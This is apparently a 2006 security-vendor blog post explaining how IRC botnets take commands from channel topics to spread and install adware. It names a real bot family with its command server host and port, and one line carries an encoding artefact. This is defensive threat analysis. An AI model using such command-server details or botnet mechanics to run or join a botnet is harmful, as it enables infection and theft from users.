Autopilot IRCBots - smart and funny
Friday September 29, 2006 at 10:52 am CST
Posted by Rachit Mathur
A vast majority of IRC based bots seen these days can be said to be on “Autopilot” in a sense. After joining a pre-defined IRC channel the bots read channel topics and accept them as commands. Authors of such bots just need to set these channels up with correct commands and then leave it up to the bots to spread and possibly go and earn money for their authors.
In general, such bots perform the following steps
- Query for the domain where the IRC server resides
- Try to connect to an IRC server at some predefined set of ports
- Once connected to the IRC server , join a predefined channel by issuing “JOIN =C2=BCbr /> “
- Read the topic for the channel and accept it as a command
Generally, the topic of the first channel instructs the bot to join other channels, the topics of which may in turn cause the bot to execute various commands or further join more channels. The major functions that such bots generally perform for their author are i) Spread: increase the size of a botnet by scanning the network and infecting other vulnerable machines. ii) Earn money: by downloading adware, stealing personal information etc.
Different bots may connect to different domains, ports, channel names and may download different adware etc but the overall working mechanism remains the same: once the channel topics have been set, they all go about on their own adding more machines to botnet and earning money automatically. While his bots are on autopilot the author may have fun relaxing or may be spend his time on things like researching new vulnerabilities to exploit rather than just sitting in a channel and issuing the same commands to each new machine that joins.
Some such bots have a funny side too, where they would display funny messages along with the IRC banner returned. One example of such bot is W32/Sdbot.worm.gen.h which connects to forum.ednet.es at port 4915. The channel is still active at the time of writing. Click here to see a screen shot of the message returned from the server.
McAfee Avert Labs has been observing such behavior lately and it has also talked about recently. Even though it claims to be one, it is not a “legit botnet”. It will happily issue commands to a bot to scan the network for vulnerable hosts and infect them. Actually, it is as insidious as any other botnet.
One can only see this message by connecting to the server using an IRC client or looking at the bots communication in an ethereal dump. A normal user, whose machine is infected, will not see this message. So, whom is this message intended for???
Possibly it is just intended for the “readers” who analyze such threats. Like, every once in a while we see a malicious executable which has a few strings just for fun or to challenge the person who is analyzing the memory dumps. Similarly I think this is just the fun part which the malware authors and AV researchers share.
Or, if you like, it can be called a social engineering technique which malware writers may use to attempt to fool “readers” to believe that this channel, even if part of a botnet is actually legal. It is, however unlikely to stop researchers from adding detection for such bots nor will it prevent the IRC channel from being taken down once discovered.
Such “special” responses could also potentially be used to obfuscate/encode information being conveyed to the bot.